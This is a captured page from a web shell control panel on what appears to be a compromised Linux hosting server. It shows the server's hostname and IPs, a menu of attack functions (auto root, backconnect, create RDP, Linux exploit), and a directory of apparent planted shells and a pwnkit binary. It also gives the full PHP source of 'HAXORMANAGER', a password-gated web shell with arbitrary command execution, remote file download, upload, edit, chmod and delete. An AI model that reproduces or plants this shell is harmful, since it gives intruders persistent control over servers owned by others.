Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
tudosorte.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
.buy.php
579
B
-rw-r--r--
.documentroot.php
280
B
-rw-r--r--
.goods.php
577
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.wp-esp.php
577
B
-rw-r--r--
0x194945BXRH.php
4.12
KB
-rw-r--r--
0x19495GZCOU.php
4.12
KB
-rw-r--r--
0x1949BIJKKG.php
4.12
KB
-rw-r--r--
0x1949LKGFCR.php
4.12
KB
-rw-r--r--
0x1949Q4FPN1.php
4.12
KB
-rw-r--r--
0x1949RNWM66.php
4.12
KB
-rw-r--r--
Private-MASS-ova.php
19.06
KB
-rw-r--r--
admin.php
209
B
-rw-r--r--
bero.pHtML
44.85
KB
-rw-r--r--
berofc.php
44.85
KB
-rw-r--r--
bw.php
9.51
KB
-rw-r--r--
dataat.pHtML
16
KB
-rw-r--r--
default.xml
402
B
-rw-r--r--
documentroot.php
280
B
-rw-r--r--
error_log
27.57
KB
-rw-r--r--
error_log.pHtML
28.62
KB
-rw-r--r--
error_log.php
28.62
KB
-rw-r--r--
finalkitaya.PHP
6.86
KB
-rw-r--r--
googlef7118cfda07b48b4.html
53
B
-rw-r--r--
index.php
381.47
KB
-rw-r--r--
logssss.pHtML
3.12
KB
-rw-r--r--
modric8BTCHM.php
70.77
KB
-rw-r--r--
modricDHXFVX.php
2.14
KB
-rw-r--r--
modricPNBH8L.php
70.77
KB
-rw-r--r--
modricZW9ITU.php
2.14
KB
-rw-r--r--
perantaraupload.php
6.02
KB
-rw-r--r--
php.ini
40
B
-rw-r--r--
postnews.php
5.72
KB
-r--r--r--
pwnkit
10.99
KB
-rwxr-xr-x
tes110000.pHtML
5.63
KB
-rw-r--r--
uploa.pHtML
6.02
KB
-rw-r--r--
wp-est.php
575
B
-rw-r--r--
wp-ompira.php
577
B
-rw-r--r--
x7.php
278
B
-rw-r--r--
没啥.php
13.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bw.php
<?php header("X-XSS-Protection: 1; mode=block"); header("X-Frame-Options: DENY"); header("X-Content-Type-Options: nosniff"); ob_start(); set_time_limit(0); error_reporting(0); ini_set('display_errors', FALSE); session_start(); // Hash password example (MD5 hashed password) $hashed_password = 'c0fdb46dacb260d53fd1112ec8f79072'; // Sanitize input function function sanitize_input($data) { return htmlspecialchars(trim($data)); } // Logout if (isset($_GET['logout'])) { session_destroy(); session_regenerate_id(true); header("Location: ?"); exit; } // Login handling if (!isset($_SESSION['logged_in'])) { if (isset($_POST['password']) && md5($_POST['password']) == $hashed_password) { $_SESSION['logged_in'] = true; } else { echo '<style> body { background-color: #2c2f33; font-family: Arial, sans-serif; color: #fff; display: flex; justify-content: center; align-items: center; height: 100vh; } form { background-color: #23272a; padding: 20px; border-radius: 5px; box-shadow: 0 0 10px rgba(0,0,0,0.5); text-align: center; } input[type="password"] { width: 100%; padding: 10px; margin: 10px 0; border: none; border-radius: 3px; } input[type="submit"] { background-color: #7289da; border: none; padding: 10px 20px; color: white; border-radius: 3px; cursor: pointer; } </style> <form method="post"> <h2>Login</h2> <input type="password" name="password" placeholder="Enter Password" required /> <input type="submit" value="Login" /> </form>'; exit; } } echo '<html><head><title>HAXORMANAGER</title>'; echo '<style> body { font-family: Arial, sans-serif; background-color: #2c2f33; color: #fff; margin: 0; padding: 0; } h1 { color: #7289da; text-align: center; } input[type="text"], input[type="password"], input[type="url"], input[type="submit"], input[type="file"] { padding: 10px; margin: 10px; width: 300px; border-radius: 5px; border: none; } input[type="submit"] { background-color: #7289da; color: white; cursor: pointer; } table { width: 90%; margin: 20px auto; border-collapse: collapse; } th, td { padding: 10px; text-align: left; border: 1px solid #444; color: #fff; } th { background-color: #7289da; } a { color: #7289da; text-decoration: none; } a:hover { text-decoration: underline; } .container { width: 80%; margin: 0 auto; } textarea { font-size: 14px; width: 100%; height: 600px; background-color: #23272a; color: #eee; border: none; padding: 10px; } </style></head><body>'; echo '<div class="container">'; echo '<h1>HAXORMANAGER</h1>'; echo '<p>This is a simple file manager tool created by HaxorNoname.</p>'; // Command execution form echo '<form method="post"> <input type="text" name="cmd" placeholder="Enter command" required /> <input type="submit" value="Execute" /> </form>'; if (isset($_POST['cmd'])) { $command = sanitize_input($_POST['cmd']); echo '<pre>' . htmlspecialchars(shell_exec($command)) . '</pre>'; } // Remote upload form echo '<form method="post"> <input type="url" name="remote_url" placeholder="Remote File URL" required /> <input type="submit" value="Remote Upload" /> </form>'; if (isset($_POST['remote_url'])) { $remote_url = filter_var($_POST['remote_url'], FILTER_SANITIZE_URL); if (filter_var($remote_url, FILTER_VALIDATE_URL)) { $file_name = basename($remote_url); if (file_put_contents($file_name, fopen($remote_url, 'r'))) { echo '<p><font color="green">Remote file uploaded successfully as ' . $file_name . '</font></p>'; } else { echo '<p><font color="red">Remote upload failed.</font></p>'; } } else { echo '<p><font color="red">Invalid URL.</font></p>'; } } // File/Folder search form echo '<form method="get"> <input type="text" name="search" placeholder="Search files or folders" /> <input type="submit" value="Search" /> </form>'; // Display current path $HX = isset($_GET['HX']) ? sanitize_input($_GET['HX']) : getcwd(); $HX = str_replace('\\', '/', $HX); $paths = explode('/', $HX); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { echo '<a href="?HX=/">/</a>'; continue; } if ($pat == '') continue; echo '<a href="?HX='; for ($i = 0; $i <= $id; $i++) { echo "$paths[$i]"; if ($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } // Create new file or directory form echo '<br><br><form method="post"> <input type="text" name="new_name" placeholder="Enter file/folder name" required /> <input type="submit" name="create_file" value="Create File" /> <input type="submit" name="create_dir" value="Create Directory" /> </form>'; if (isset($_POST['create_file'])) { $new_file = $HX . '/' . sanitize_input($_POST['new_name']); if (file_put_contents($new_file, '') !== false) { echo '<p><font color="green">File created successfully.</font></p>'; } else { echo '<p><font color="red">Failed to create file.</font></p>'; } } if (isset($_POST['create_dir'])) { $new_dir = $HX . '/' . sanitize_input($_POST['new_name']); if (mkdir($new_dir)) { echo '<p><font color="green">Directory created successfully.</font></p>'; } else { echo '<p><font color="red">Failed to create directory.</font></p>'; } } // File upload form echo '<br><form enctype="multipart/form-data" method="POST"> <input type="file" name="file" required /> <input type="submit" value="Upload" /> </form>'; if (isset($_FILES['file'])) { $target_file = $HX . '/' . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) { echo '<p><font color="green">File uploaded successfully.</font></p>'; } else { echo '<p><font color="red">File upload failed.</font></p>'; } } // Display file structure echo '<table>'; $scandir = scandir($HX); if (isset($_GET['search'])) { $search_query = strtolower($_GET['search']); $scandir = array_filter($scandir, function($file) use ($search_query) { return strpos(strtolower($file), $search_query) !== false; }); } foreach ($scandir as $item) { if ($item == '.' || $item == '..') continue; $path = "$HX/$item"; $isDir = is_dir($path) ? 'Directory' : 'File'; $size = is_file($path) ? filesize($path) : '-'; echo "<tr> <td>$isDir</td> <td><a href=\"?HX=$path\">$item</a></td> <td>$size</td> <td><a href=\"?option=edit&HX=$path\">Edit</a> | <a href=\"?option=chmod&HX=$path\">Chmod</a> | <a href=\"?option=rename&HX=$path\">Rename</a> | <a href=\"?option=delete&HX=$path\" onclick=\"return confirm('Are you sure?')\">Delete</a> | <a href=\"?download=$path\">Download</a> </td> </tr>"; } echo '</table>'; // File download if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); flush(); readfile($file); exit; } else { echo '<p><font color="red">File not found.</font></p>'; } } // File operations (edit, chmod, rename, delete) if (isset($_GET['option'])) { $option = $_GET['option']; $file = $_GET['HX']; if ($option == 'edit') { if (isset($_POST['new_content'])) { file_put_contents($file, $_POST['new_content']); echo '<p><font color="green">File edited successfully.</font></p>'; } echo '<form method="post"> <textarea name="new_content">'.htmlspecialchars(file_get_contents($file)).'</textarea> <input type="submit" value="Save Changes" /> </form>'; } elseif ($option == 'chmod') { if (isset($_POST['new_perms'])) { chmod($file, octdec($_POST['new_perms'])); echo '<p><font color="green">Permissions changed successfully.</font></p>'; } echo '<form method="post"> <input type="text" name="new_perms" placeholder="Enter new permissions (e.g., 0755)" required /> <input type="submit" value="Change Permissions" /> </form>'; } elseif ($option == 'rename') { if (isset($_POST['new_name'])) { rename($file, dirname($file) . '/' . $_POST['new_name']); echo '<p><font color="green">File renamed successfully.</font></p>'; } echo '<form method="post"> <input type="text" name="new_name" placeholder="Enter new name" required /> <input type="submit" value="Rename" /> </form>'; } elseif ($option == 'delete') { if (is_dir($file)) { rmdir($file); } else { unlink($file); } echo '<p><font color="red">File deleted successfully.</font></p>'; } } echo '</div></body></html>'; ?>
Close
